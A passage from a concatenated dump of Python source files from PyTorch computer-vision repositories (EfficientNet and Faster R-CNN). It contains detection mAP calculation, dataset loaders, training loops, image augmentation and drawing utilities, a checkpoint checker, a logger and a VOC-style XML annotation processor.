matched = torch.nonzero(target_labels == pred_label, as_tuple=True) # (N)
correct = self._is_box_correct(pred_box, target_boxes, matched, have_detected, self.iou_thresh)
self.pred_table_list[pred_label].append((pred_score, correct))
def get_ap_dict(self):
ap_list = [0. for _ in range(len(self.labels))]
for i, (pred_table, target_num) in enumerate(zip(self.pred_table_list, self.target_num_list)):
prec_list, recall_list = self._calc_pr(pred_table, target_num)
ap_list[i] = self._calc_ap(prec_list, recall_list)
ap_dict = {label: ap for label, ap in zip(self.labels, ap_list)}
return ap_dict
@staticmethod
def print_ap(ap_dict):
mean_ap = sum(ap_dict.values()) / len(ap_dict)
print("mAP: %f" % mean_ap)
print("AP: ")
for label, ap in ap_dict.items():
print(" %s: %f" % (label, ap))
print("", end="", flush=True)
@staticmethod
def _is_box_correct(pred_box, target_boxes, matched, have_detected, iou_thresh=0.5):
"""
:param pred_box: Tensor[4]
:param target_boxes: Tensor[N, 4]. all
:param matched: Tensor[NUM]
:param have_detected: Tensor[N]. bool
:param iou_thresh: int
:return: bool
"""
t_boxes = target_boxes[matched] # (NUM, 4)
if t_boxes.shape[0] == 0:
return False
iou_max, idx = torch.max(box_iou(pred_box[None], t_boxes)[0], dim=0) # (N) -> ()
if iou_max < iou_thresh:
return False
elif have_detected[matched[0][idx]]:
return False
else:
have_detected[matched[0][idx]] = True
return True
@staticmethod
def _calc_pr(pred_table, target_num):
"""calculate precision and recall
:param pred_table: List[tuple(score(float), correct(bool))]. const
:param target_num: int. const
:return: recall_list: List[NUM], prec_list: List[NUM]
"""
pred_table = sorted(pred_table, key=lambda x: -x[0])
prec_list, recall_list = [], []
correct_num = 0
for i, (_, correct) in enumerate(pred_table):
pred_num = i + 1 # 预测的次数
if correct:
correct_num += 1 # 正确的次数
prec_list.append(correct_num / pred_num)
recall_list.append(correct_num / target_num)
return prec_list, recall_list
@staticmethod
def _calc_ap(prec_list, recall_list):
"""prec_list, recall_list(单调递增). (recall, prec)为一个点"""
# 1. 预处理
prec_list.insert(0, 0.)
prec_list.append(0.)
recall_list.insert(0, 0.)
recall_list.append(1.)
for i in reversed(range(len(recall_list) - 1)):
prec_list[i] = max(prec_list[i], prec_list[i + 1])
# 2. 每个recall值取一个点(prec最高的点)
idx_list = [0]
for i in range(0, len(recall_list) - 1):
if recall_list[i + 1] != recall_list[i]:
idx_list.append(i + 1)
# 3. 计算
ap = 0.
for i in range(len(idx_list) - 1):
start = recall_list[idx_list[i]]
end = recall_list[idx_list[i + 1]]
value = prec_list[idx_list[i + 1]]
ap += (end - start) * value
return ap
```
#### File: utils/detection/my_dataset.py
```python
import torch.utils.data as tud
import os
from PIL import Image
from ..utils import load_from_pickle, save_to_pickle
from .xml_processor import XMLProcessor
from .utils import test_transforms
def get_dataset_from_pickle(root_dir, pkl_name, images_folder=None, pkl_folder=None, transforms=None):
image_fname_list, target_list = \
load_from_pickle(os.path.join(root_dir, pkl_folder or "pkl", pkl_name))
return MyDataset(root_dir, image_fname_list, target_list, images_folder, transforms)
class MyDataset(tud.Dataset):
def __init__(self, root_dir, image_fname_list, target_list, images_folder=None, transforms=None):
"""
:param root_dir: str
:param image_fname_list: List[str]
:param target_list: List[Dict]
:param images_folder: str = "JPEGImages"
:param transforms: func(image: PIL.Image, target) -> (image: Tensor[C, H, W] RGB, target)
默认(test_transforms)
"""
self.root_dir = root_dir
self.images_folder = images_folder or "JPEGImages"
assert len(image_fname_list) == len(target_list)
self.image_fname_list = image_fname_list
self.target_list = target_list
self.transforms = transforms or test_transforms
def __getitem__(self, idx):
image_fname = self.image_fname_list[idx]
target = self.target_list[idx]
images_dir = os.path.join(self.root_dir, self.images_folder)
if isinstance(idx, slice):
return self.__class__(self.root_dir, image_fname, target, self.images_folder, self.transforms)
else:
image_path = os.path.join(images_dir, image_fname)
with Image.open(image_path) as image: # type: Image.Image
image, target = self.transforms(image, target)
return image, target
def __len__(self):
return len(self.image_fname_list)
class VOC_Dataset(MyDataset):
labels_str2int = {
# Person
"person": 0,
# Animal
"bird": 1, "cat": 2, "cow": 3, "dog": 4, "horse": 5, "sheep": 6,
# Vehicle
"aeroplane": 7, "bicycle": 8, "boat": 9, "bus": 10, "car": 11, "motorbike": 12, "train": 13,
# Indoor:
"bottle": 14, "chair": 15, "diningtable": 16, "pottedplant": 17, "sofa": 18, "tvmonitor": 19
}
labels_int2str = list(labels_str2int.keys())
def __init__(self, root, year, image_set, transforms=None):
"""
:param root: str. 存放VOCdevkit的文件夹
:param year: str. e.g. 0712, 2007, 2012
:param image_set: str{"train", "val", "trainval", "test"}
:param transforms: func(image: PIL.Image, target) -> (image: Tensor[C, H, W] RGB, target).
default: self._default_trans_func
"""
assert os.path.exists(root), "Please download VOC_dataset to this path"
root_dir = os.path.join(root, "VOCdevkit", "VOC%s" % year)
pkl_dir = os.path.join(root_dir, "pkl")
os.makedirs(pkl_dir, exist_ok=True)
pkl_path = os.path.join(pkl_dir, "voc_%s_%s.pkl" % (year, image_set))
if os.path.exists(pkl_path):
image_fname_list, target_list = load_from_pickle(pkl_path)
else:
xml_processor = XMLProcessor(root_dir, labels=self.labels_str2int,
image_set_path=r"./ImageSets/Main/%s.txt" % image_set)
xml_processor.parse_xmls()
xml_processor.test_dataset()
save_to_pickle((xml_processor.image_fname_list, xml_processor.target_list), pkl_path)
image_fname_list, target_list = xml_processor.image_fname_list, xml_processor.target_list
super(VOC_Dataset, self).__init__(root_dir, image_fname_list, target_list, transforms=transforms)
```
#### File: utils/detection/trainer.py
```python
from .utils import to, collate_fn
from torch.utils.data import DataLoader
import torch
class RuntimeErrorHandler:
def __init__(self, ignore_num):
self.ignore_num_ori = self.ignore_num = ignore_num
def error(self, e):
if self.ignore_num > 0:
print(e, flush=True)
self.ignore_num -= 1
else:
raise e
def init(self):
self.ignore_num = self.ignore_num_ori
class Trainer:
def __init__(self, model, optim, train_dataset, batch_size, device,
lr_scheduler=None, logger=None, checker=None, runtime_error_handler=None):
self.model = model.to(device)
self.optim = optim
self.train_loader = DataLoader(train_dataset, batch_size, True, collate_fn=collate_fn, pin_memory=True)
self.device = device
self.lr_scheduler = lr_scheduler
self.logger = logger
assert checker
self.checker = checker
self.runtime_error_handler = runtime_error_handler or RuntimeErrorHandler(ignore_num=2)
def train(self, epoch_range):
for epoch in range(*epoch_range):
self.model.train()
if self.lr_scheduler:
self.lr_scheduler.step(epoch)
lr = self.optim.param_groups[0]['lr']
self.logger.new_epoch(epoch, len(self.train_loader), lr)
for i, (x, y) in enumerate(self.train_loader):
try:
x, y = to(x, y, self.device)
loss = sum(self.model(x, y).values())
self.optim.zero_grad()
loss.backward()
self.optim.step()
if self.logger:
self.logger.step(loss.item(), i + 1)
self.runtime_error_handler.init()
except RuntimeError as e:
x, y, loss = None, None, None
torch.cuda.empty_cache()
try:
self.runtime_error_handler.error(e)
except RuntimeError as e:
self.checker.saver.save("tmp_epoch%d_step%d" % (epoch, i + 1))
raise e
if self.checker:
self.checker.step(epoch, last=(epoch == epoch_range[1] - 1))
``` |
{
"source": "Jintao-Huang/EfficientNet_PyTorch",
"score": 2
} |
#### File: EfficientNet_PyTorch/models/utils.py
```python
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
import torch
import torch.nn.functional as F
import math
def freeze_layers(model, layers):
"""冻结层"""
for name, parameter in model.named_parameters():
for layer in layers:
if layer in name: # 只要含有名字即可
parameter.requires_grad_(False)
break
else:
parameter.requires_grad_(True)
def model_info(model, img_size):
img_size = img_size if isinstance(img_size, (tuple, list)) else (img_size, img_size)
num_params = sum(x.numel() for x in model.parameters()) # number parameters
num_grads = sum(x.numel() for x in model.parameters() if x.requires_grad) # number gradients
try: # FLOPS
from thop import profile
p = next(model.parameters())
x = torch.rand((1, 3, 32, 32), dtype=p.dtype, device=p.device)
macs, num_params = profile(model, inputs=(x,), verbose=False)
flops = 2 * macs
flops_str = ", %.1f GFLOPS" % (flops * img_size[0] * img_size[1] / 32 / 32 / 1e9) # 640x640 GFLOPS
except (ImportError, Exception):
flops_str = ""
print("Model Summary: %d layers, %d parameters, %d gradients%s" %
(len(list(model.modules())), num_params, num_grads, flops_str))
def label_smoothing_cross_entropy(pred, target, smoothing: float = 0.1):
"""reference: https://github.com/seominseok0429/label-smoothing-visualization-pytorch
:param pred: shape(N, In). 未过softmax
:param target: shape(N,)
:param smoothing: float
:return: shape()
"""
pred = F.log_softmax(pred, dim=-1)
ce_loss = F.nll_loss(pred, target)
smooth_loss = -torch.mean(pred)
return (1 - smoothing) * ce_loss + smoothing * smooth_loss
def cosine_annealing_lr(epoch, T_max, min_lr, max_lr):
return min_lr + (max_lr - min_lr) * (1 + math.cos(epoch / T_max * math.pi)) / 2
```
#### File: Jintao-Huang/EfficientNet_PyTorch/train_example.py
```python
from models.efficientnet import efficientnet_b0, std_preprocess, config_dict
import torch
from utils.display import resize_pad
import numpy as np
import cv2 as cv
import torch.nn as nn
from utils.utils import processing
def pred_transform(image, target):
"""
:param image: ndarray[H, W, C] RGB
:param target: None
:return: ndarray[H, W, C] RGB 0-255, None"""
image = resize_pad(image, image_size, False, 32, False, 114)[0]
return image, target
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
efficientnet = efficientnet_b0
image_size = config_dict[efficientnet.__name__][2]
# read images
image_fname = "images/1.jpg"
x = cv.imread(image_fname, cv.IMREAD_COLOR)
x = processing(x, pred_transform)[0].to(device)[None] / 255
y_true = torch.randint(0, 2, (1,)).to(device)
model = efficientnet(pretrained=True, num_classes=2).to(device)
loss_fn = nn.CrossEntropyLoss()
optim = torch.optim.SGD(model.parameters(), 1e-3, 0.9)
for i in range(20):
pred = model(x)
loss = loss_fn(pred, y_true)
optim.zero_grad()
loss.backward()
optim.step()
print("loss: %f" % loss.item())
```
#### File: EfficientNet_PyTorch/utils/display.py
```python
import numpy as np
import cv2 as cv
from PIL import Image
import random
import math
def imwrite(image, filename):
"""cv无法读取中文字符 (CV cannot read Chinese characters)"""
retval, arr = cv.imencode('.' + filename.rsplit('.', 1)[1], image) # retval: 是否保存成功
if retval is True:
arr.tofile(filename)
return retval
def imread(filename):
"""cv无法读取中文字符 (CV cannot read Chinese characters)"""
arr = np.fromfile(filename, dtype=np.uint8)
return cv.imdecode(arr, -1)
def pil_to_cv(img):
"""转PIL.Image到cv (Turn PIL.Image to CV(BGR))
:param img: PIL.Image. RGB, RGBA, L. const
:return: ndarray. BGR, BGRA, L (H, W, C{1, 3, 4})
"""
mode = img.mode
arr = np.asarray(img)
if mode == "RGB":
arr = cv.cvtColor(arr, cv.COLOR_RGB2BGR)
elif mode == "RGBA":
arr = cv.cvtColor(arr, cv.COLOR_RGBA2BGRA)
elif mode in ("L",):
arr = arr
else:
raise ValueError("img.mode nonsupport")
return arr
def cv_to_pil(arr):
"""转cv到PIL.Image (Turn CV(BGR) to PIL.Image)
:param arr: ndarray. BGR, BGRA, L. const
:return: PIL.Image. RGB, RGBA,L
"""
if arr.ndim == 2:
pass
elif arr.ndim == 3:
arr = cv.cvtColor(arr, cv.COLOR_BGR2RGB)
else: # 4
arr = cv.cvtColor(arr, cv.COLOR_BGRA2RGBA)
return Image.fromarray(arr)
def resize_max(image, max_height=None, max_width=None):
"""将图像resize成最大不超过max_height, max_width的图像. (双线性插值)
:param image: ndarray[H, W, C]. BGR. const
:param max_width: int
:param max_height: int
:return: ndarray[H, W, C]. BGR"""
# 1. 输入
height0, width0 = image.shape[:2]
max_width = max_width or width0
max_height = max_height or height0
# 2. 算法
ratio = min(max_height / height0, max_width / width0)
new_shape = int(round(width0 * ratio)), int(round(height0 * ratio))
image = cv.resize(image, new_shape, interpolation=cv.INTER_LINEAR)
return image
def get_scale_pad(img_shape, new_shape, rect=True, stride=32, only_pad=False):
"""
:param img_shape: Tuple[W, H]
:param new_shape: Tuple[W, H]
:param rect: True: 矩形, False: 正方形
:param stride:
:param only_pad:
:return: ratio: float, new_unpad: Tuple[W, H], (pad_w, pad_h)
"""
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
ratio = 1 if only_pad else min(new_shape[0] / img_shape[0], new_shape[1] / img_shape[1])
new_unpad = int(round(img_shape[0] * ratio)), int(round(img_shape[1] * ratio)) # new image unpad shape
# Compute padding
pad_w, pad_h = new_shape[0] - new_unpad[0], new_shape[1] - new_unpad[1] # square
if rect: # detect. rect
pad_w, pad_h = pad_w % stride, pad_h % stride
pad_w, pad_h = pad_w / 2, pad_h / 2 # divide padding into 2 sides
return ratio, new_unpad, (pad_w, pad_h)
def resize_pad(img, new_shape=640, rect=True, stride=32, only_pad=False, fill_value=114):
"""copy from official yolov5 letterbox()
:param img: ndarray[H, W, C]
:param new_shape: Union[int, Tuple[W, H]]
:param rect: bool. new_shape是否自动适应
:param color: BRG
:param stride: int
:param only_pad: 不resize, 只pad
:return: img: ndarray[H, W, C], ratio: float, pad: Tuple[W, H]
"""
# Resize and pad image
fill_value = (fill_value, fill_value, fill_value) if isinstance(fill_value, (int, float)) else fill_value
shape = img.shape[1], img.shape[0] # Tuple[W, H]
new_shape = (new_shape, new_shape) if isinstance(new_shape, int) else new_shape
ratio, new_unpad, (pad_w, pad_h) = get_scale_pad(shape, new_shape, rect, stride, only_pad)
if ratio != 1: # resize
img = cv.resize(img, new_unpad, interpolation=cv.INTER_LINEAR)
top, bottom = int(round(pad_h - 0.1)), int(round(pad_h + 0.1)) # 防止0.5, 0.5
left, right = int(round(pad_w - 0.1)), int(round(pad_w + 0.1))
img = cv.copyMakeBorder(img, top, bottom, left, right, cv.BORDER_CONSTANT, value=fill_value) # add border(grey)
return img, ratio, (pad_w, pad_h) # 处理后的图片, 比例, padding的像素
def random_perspective(img, degrees=10, translate=.1, scale=.1, shear=10, perspective=0, fill_value=114):
"""torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
:param img: ndarray[H, W, C]. BGR
:param degrees: 旋转
:param translate: 平移
:param scale: 缩放
:param shear: 斜切
:param perspective: 透视
:return: ndarray[H, W, C]. BGR
"""
#
fill_value = (fill_value, fill_value, fill_value) if isinstance(fill_value, (int, float)) else fill_value
height, width = img.shape[:2]
# Center.
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective 透视
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale 旋转, 缩放
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear 斜切
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation 平移
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (M != np.eye(3)).any(): # image changed
if perspective:
img = cv.warpPerspective(img, M, dsize=(width, height), flags=cv.INTER_LINEAR,
borderValue=fill_value)
else: # affine
img = cv.warpAffine(img, M[:2], dsize=(width, height), flags=cv.INTER_LINEAR,
borderValue=fill_value)
return img
def random_crop(image, scale_range, fill_value=114):
"""
:param image: ndarray[H, W, C]. BGR
:param scale_range: 裁剪范围. [2个值]. [hw_scale_min, hw_scale_max]
:return: ndarray[H, W, C]. BGR
"""
h0, w0 = image.shape[:2]
h = int(random.uniform(scale_range[0], scale_range[1]) * h0)
w = int(random.uniform(scale_range[0], scale_range[1]) * w0)
left0, top0 = int(random.uniform(0, w0 - w)), int(random.uniform(0, h0 - h))
left, top = (w0 - w) // 2, (h0 - h) // 2 # 在中心
out = np.full_like(image, fill_value=fill_value)
out[top:top + h, left: left + w] = image[top0:top0 + h, left0: left0 + w]
return out
def augment_hsv(img, h=0.015, s=0.7, v=0.4):
"""
:param img: ndarray[H, W, C]. BGR
:param h: 色调
:param s: 饱和度
:param v: 明度
:return:
"""
r = np.random.uniform(-1, 1, 3) * [h, s, v] + 1 # random gains
hue, sat, val = cv.split(cv.cvtColor(img, cv.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv.merge((cv.LUT(hue, lut_hue), cv.LUT(sat, lut_sat), cv.LUT(val, lut_val))).astype(dtype)
img = cv.cvtColor(img_hsv, cv.COLOR_HSV2BGR) # no return needed
return img
def draw_box(image, box, color):
"""在给定图像上绘制一个方框 (Draws a box on a given image)
:param image: shape(H, W, C) BGR. 变
:param box: len(4), (ltrb)
:param color: len(3). BGR
"""
image = np.asarray(image, np.uint8)
box = np.asarray(box, dtype=np.int)
cv.rectangle(image, (box[0], box[1]), (box[2], box[3]), color, 2, cv.LINE_4)
def draw_text(image, box, text, rect_color):
"""在图像的方框上方绘制文字 (Draw text above the box of the image)
:param image: shape(H, W, C) BGR. 变
:param box: len(4), (ltrb)
:param text: str
:param rect_color: BGR
"""
image = np.asarray(image, np.uint8)
box = np.asarray(box, dtype=np.int)
cv.rectangle(image, (box[0] - 1, box[1] - 16), (box[0] + len(text) * 9, box[1]), rect_color, -1, cv.LINE_4)
cv.putText(image, text, (box[0], box[1] - 4), cv.FONT_HERSHEY_DUPLEX, 0.5, (0, 0, 0), 1, cv.LINE_8)
def draw_target_in_image(image, boxes, labels, scores, color=(0, 252, 124)):
"""画框在image上 (draw boxes and text in image)
:param image: ndarray[H, W, C]. BGR. not const
:param boxes: ndarray[X, 4]. ltrb, 未归一化
:param labels: List[str]. Len[X].
:param scores: ndarray[X]. 从大到小排序
:param color: List -> tuple(B, G, R) # [0, 256).
:return: None
"""
boxes = np.round(boxes).astype(np.int32)
# draw
for box in boxes:
draw_box(image, box, color=color) # 画方框
if labels is None:
return
if scores is None:
scores = [None] * labels.shape[0]
for box, label, score in reversed(list(zip(boxes, labels, scores))): # 先画框再写字: 防止框把字盖住. 概率大盖住概率小
text = "%s %.2f" % (label, score) if score else "%s" % label
draw_text(image, box, text, color) # 写字
```
#### File: utils/tools/checker.py
```python
import os
class Checker:
def __init__(self, test_tester_dict, saver, check_epoch, ignore_num, logger=None):
"""
:param test_tester_dict:
:param saver:
:param check_epoch: int. 每几个epoch check一次
:param ignore_num: int. 前几次忽略的次数. 不check
:param logger:
"""
self.test_tester_dict = test_tester_dict
self.saver = saver
self.logger = logger
self.check_epoch = check_epoch
self.ignore_num = ignore_num # ignore check_epoch
self.best_test = 0.
def step(self, epoch, last=False):
if last or epoch % self.check_epoch == self.check_epoch - 1:
if self.ignore_num > 0:
self.ignore_num -= 1
return
best_test = []
for k, test_tester in self.test_tester_dict.items():
print("----------------------------- %s" % k)
test_acc_dict = test_tester.test(last)
if self.logger:
self.logger.log_mes({"%s_acc" % k: test_acc_dict})
with open(os.path.join(self.saver.save_dir, "result.txt"), "a") as f:
f.write("%s_epoch%d_ACC: \n" % (k, epoch))
for label, acc in test_acc_dict.items():
f.write(" %s: %.4f%%\n" % (label, acc * 100))
if k.lower() == "train":
continue
test_total_acc = test_acc_dict['total_acc']
best_test.append(test_total_acc)
print("-----------------------------")
best_test = sum(best_test) / len(best_test)
if best_test >= self.best_test or last:
self.best_test = best_test
save_dir = self.saver.save_dir
if last:
fname = "model_epoch%d_test%.4f_last.pth" % (epoch, best_test)
else: # not last
fname = "model_epoch%d_test%.4f.pth" % (epoch, best_test)
# 删除多余
for f in os.listdir(save_dir):
if f.endswith(".pth"):
path = os.path.join(save_dir, f)
print("Removed model %s..." % f, flush=True)
os.remove(path)
self.saver.save(fname)
print("Saved model %s..." % fname, flush=True)
```
#### File: utils/tools/logger.py
```python
import time
class Logger:
def __init__(self, print_steps, writer=None):
"""Notice: 需要显式的关闭writer. `writer.close()`"""
self.writer = writer
self.print_steps = print_steps
self.steps_each_epoch = None
# ----------------
self.epoch = None
self.lr = None
self.steps = None
self.loss = None
self.epoch_start_time = None
self.mini_start_time = None
def new_epoch(self, epoch, steps_each_epoch):
self.epoch = epoch
self.steps_each_epoch = steps_each_epoch
self.steps = 0
self.loss = []
self.epoch_start_time = time.time()
self.mini_start_time = time.time()
def step(self, loss, lr):
self.steps += 1
self.lr = lr
self.loss.append(loss)
if self.steps % self.print_steps == 0 or self.steps == self.steps_each_epoch:
self._print_mes(last=self.steps == self.steps_each_epoch)
if self.writer:
self.log_mes({"loss/loss": loss, **{"lr/lr%d" % i: _lr for i, _lr in enumerate(lr)}})
def log_mes(self, logs):
for key, value in logs.items():
if isinstance(value, dict):
for k, v in value.items():
if k in ("total_acc", "mean_acc"):
self.writer.add_scalar("%s_all/%s" % (key, k), v,
self.epoch * self.steps_each_epoch + self.steps)
else:
self.writer.add_scalar("%s/%s" % (key, k), v, self.epoch * self.steps_each_epoch + self.steps)
else:
self.writer.add_scalar(key, value, self.epoch * self.steps_each_epoch + self.steps)
def _print_mes(self, last=False):
loss_mean = sum(self.loss) / len(self.loss)
if last:
time_ = time.time() - self.epoch_start_time
print("Total ", end="")
else:
time_ = time.time() - self.mini_start_time
print("Train| Epoch: %d[%d/%d (%.2f%%)]| Loss: %f| Time: %.4f| LR: %s" %
(self.epoch, self.steps, self.steps_each_epoch, self.steps / self.steps_each_epoch * 100,
loss_mean, time_, ",".join(["%.4g" % _lr for _lr in self.lr])), flush=True)
self.mini_start_time = time.time()
```
#### File: utils/tools/my_dataset.py
```python
import torch.utils.data as tud
import torch
from ..utils import load_from_pickle, processing
import cv2 as cv
import numpy as np
def get_dataset_from_pickle(pkl_path, transforms=None):
img_path_list, target_list = load_from_pickle(pkl_path)
return MyDataset(img_path_list, target_list, transforms)
class MyDataset(tud.Dataset):
def __init__(self, img_path_list, target_list, transform=None):
"""
:param img_path_list: List[str]
:param target_list: List[int]
:param transform: [](image: ndarray[H, W, C]BRG, target) -> image: ndarray[H, W, C]BRG, target
默认(self._default_trans_func)
"""
assert len(img_path_list) == len(target_list)
self.img_path_list = img_path_list
self.target_list = target_list
self.transform = transform
def __getitem__(self, idx):
"""
:param idx:
:return: Tensor[C, H, W] RGB
"""
img_path = self.img_path_list[idx]
target = self.target_list[idx]
if isinstance(idx, slice):
return self.__class__(img_path, target, self.transform)
else:
x = cv.imread(img_path)
x, target = processing(x, target, self.transform)
return x, target
def __len__(self):
return len(self.img_path_list)
```
#### File: utils/tools/trainer.py
```python
import torch
from ..tools.utils import to
class Trainer:
def __init__(self, model, train_loader, loss_fn, optim, device,
lr_scheduler=None, logger=None, checker=None):
self.model = model.to(device)
self.train_loader = train_loader
self.loss_fn = loss_fn
self.optim = optim
self.device = device
self.lr_scheduler = lr_scheduler
self.logger = logger
assert checker
self.checker = checker
self.steps_each_epoch = len(self.train_loader)
def train(self, epoch_range):
for epoch in range(*epoch_range):
self.model.train()
self.logger.new_epoch(epoch, self.steps_each_epoch)
for i, (x, target) in enumerate(self.train_loader):
try:
self.lr_scheduler.step(epoch, epoch * self.steps_each_epoch + i) \
if self.lr_scheduler is not None else None
x = x / 255
x, target = to(x, target, self.device)
pred = self.model(x)
# loss = F.cross_entropy(pred, target)
loss = self.loss_fn(pred, target)
self.optim.zero_grad()
loss.backward()
self.optim.step()
self.logger.step(loss.item(), self.lr_scheduler.get_lr())
except RuntimeError as e:
torch.cuda.empty_cache()
self.checker.saver.save("tmp_epoch%d_step%d" % (epoch, i + 1))
raise e
if self.checker:
self.checker.step(epoch, last=(epoch == epoch_range[1] - 1))
```
#### File: utils/tools/utils.py
```python
def to(images, targets, device):
"""
:param images: List[Tensor[C, H, W]]
:param targets: List[int] / None
:param device: str / device
:return: images: List[Tensor[C, H, W]], targets: List[Tensor_int] / None
"""
images = images.to(device)
if targets is not None:
targets = targets.to(device)
return images, targets
``` |
{
"source": "Jintao-Huang/FasterRCNN_PyTorch",
"score": 2
} |
#### File: utils/detection/xml_processor.py
```python
import os
import torch
import re
import numpy as np
import cv2 as cv
import shutil
from ..display import imread, draw_target_in_image, resize_max
from ..utils import load_from_pickle, save_to_pickle
from PIL import Image
from .utils import hflip_image
class XMLProcessor:
"""$"""
def __init__(self, root_dir, images_folder=None, annos_folder=None, pkl_folder=None,
category=None, labels_map=None, exist_ok=False):
"""
:param root_dir: str
:param images_folder: str
:param annos_folder: str
:param pkl_folder: str
:param category: dict[str: int] 可多对一
:param labels_map: dict[int: str]
"""
self.root_dir = root_dir
self.images_dir = os.path.join(root_dir, images_folder or "JPEGImages")
self.annos_dir = os.path.join(root_dir, annos_folder or "Annotations")
self.pkl_dir = os.path.join(root_dir, pkl_folder or "pkl")
os.makedirs(self.pkl_dir, exist_ok=exist_ok)
assert category and labels_map
self.category = category
self.labels_map = labels_map
self.exist_ok = exist_ok
def xmls_to_pickle(self, pkl_fname=None):
"""将xml的文件列表转为pickle
默认检查: (图片文件存在, 每张图片至少一个目标, 目标名在category中.)
:param pkl_fname: str = "images_targets.pkl".
:return: None
"""
pkl_fname = pkl_fname or "images_targets.pkl"
annos_dir = self.annos_dir
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
if not self.exist_ok and os.path.exists(pkl_path):
raise FileExistsError("%s is exists" % pkl_path)
# -----------------------------
image_fname_list = [] # len(N)
target_list = [] # len(N * dict("boxes": shape(NUMi, 4), "labels": shape(NUMi,))
xml_fname_list = os.listdir(annos_dir)
for i, xml_fname in enumerate(xml_fname_list):
image_fname, target = self._get_data_from_xml(xml_fname)
image_fname_list.append(image_fname)
target_list.append(target)
print("\r>> %d / %d" % (i + 1, len(xml_fname_list)), end="", flush=True)
print()
save_to_pickle((image_fname_list, target_list), pkl_path)
print("-------------------------------------------------")
print("Original:")
self.test_dataset(pkl_fname)
def calc_anchor_distribute(self, pkl_fname, ratios_div_lines=None, sizes_div_lines=None):
"""查看boxes的比例分布(H / W), 大小分布(size)
:param pkl_fname: str
:param ratios_div_lines: Tensor = np.linspace(0, 3, 31).'
:param sizes_div_lines: Tensor = np.array([0, 8, 16, 32, 64, 128, 256, 512, 1024])
"""
if ratios_div_lines is None:
ratios_div_lines = np.linspace(0, 3, 31)
if sizes_div_lines is None:
sizes_div_lines = np.array([0, 8, 16, 32, 64, 128, 256, 512, 1024], dtype=np.long)
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
_, target_list = load_from_pickle(pkl_path)
def get_ratio_size(box):
"""获得ratio
:param box: shape(4,). ltrb
:return: float
"""
l, t, r, b = box
w, h = r - l, b - t
return (h / w).item(), torch.sqrt(w * h).item()
def get_distribute_index(arr, x):
"""arr[idx] <= x < arr[idx + 1]"""
if x < arr[0]:
raise ValueError("x(%.2f) < arr[0](%.2f)" % (x, arr[0]))
for idx in reversed(range(len(arr))):
if x >= arr[idx]:
break
return idx
# ----------------------------- 计算distribute
ratios_distribute = np.zeros_like(ratios_div_lines, dtype=np.long)
sizes_distribute = np.zeros_like(sizes_div_lines, dtype=np.long)
for i, target in enumerate(target_list):
for box in target["boxes"]:
ratio, size = get_ratio_size(box)
ratio_idx = get_distribute_index(ratios_div_lines, ratio)
size_idx = get_distribute_index(sizes_div_lines, size)
ratios_distribute[ratio_idx] += 1
sizes_distribute[size_idx] += 1
print("Anchor ratios distribute(floor):")
for line in ratios_div_lines:
print("%-7.2f|" % line, end="")
print()
for num in ratios_distribute:
print("%-7d|" % num, end="")
print()
print("Anchor sizes distribute(floor):")
for line in sizes_div_lines:
print("%-7d|" % line, end="")
print()
for num in sizes_distribute:
print("%-7d|" % num, end="")
print()
def test_dataset(self, pkl_fname):
"""测试pickle文件(图片存在, 输出总图片数、各个分类的目标数). 并打印检查信息
:return: None
"""
labels_map = self.labels_map
# --------------------------------
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
image_fname_list, target_list = load_from_pickle(pkl_path)
print("images数量: %d" % len(image_fname_list))
print("targets数量: %d" % len(target_list))
# 获取target各个类的数目
# 1. 初始化classes_num_dict
classes_num_dict = {label_name: 0 for label_name in labels_map.values()}
# 2. 累加
for target in target_list: # 遍历每一张图片
for label in target["labels"]:
label = label.item()
classes_num_dict[labels_map[label]] += 1
# 3. 打印
print("classes_num:")
for object_name, value in classes_num_dict.items():
print("\t%s: %d" % (object_name, value))
print("\tAll: %d" % sum(classes_num_dict.values()))
def show_dataset(self, pkl_fname, colors_map=None, random=False):
"""展示数据集,一张张展示
:param pkl_fname: str
:param colors_map: Dict / List
:param random: bool
:return: None
"""
images_dir = self.images_dir
labels_map = self.labels_map
pkl_path = os.path.join(self.pkl_dir, pkl_fname)
# --------------------
image_fname_list, target_list = load_from_pickle(pkl_path)
if random:
orders = np.random.permutation(range(len(image_fname_list)))
else:
orders = range(len(image_fname_list))
for i in orders: # 随机打乱
# 1. 数据结构
img_fname = image_fname_list[i]
target = target_list[i]
img_path = os.path.join(images_dir, img_fname)
# 2. 打开图片
image = imread(img_path)
draw_target_in_image(image, target, colors_map, labels_map)
image = resize_max(image, 720, 1080)
cv.imshow("%s" % img_fname, image)
cv.waitKey(0)
cv.destroyWindow("%s" % img_fname)
def concat_pickle(self, processor_list, old_pkl_fname_list, new_pkl_fname=None, prefix_list=None):
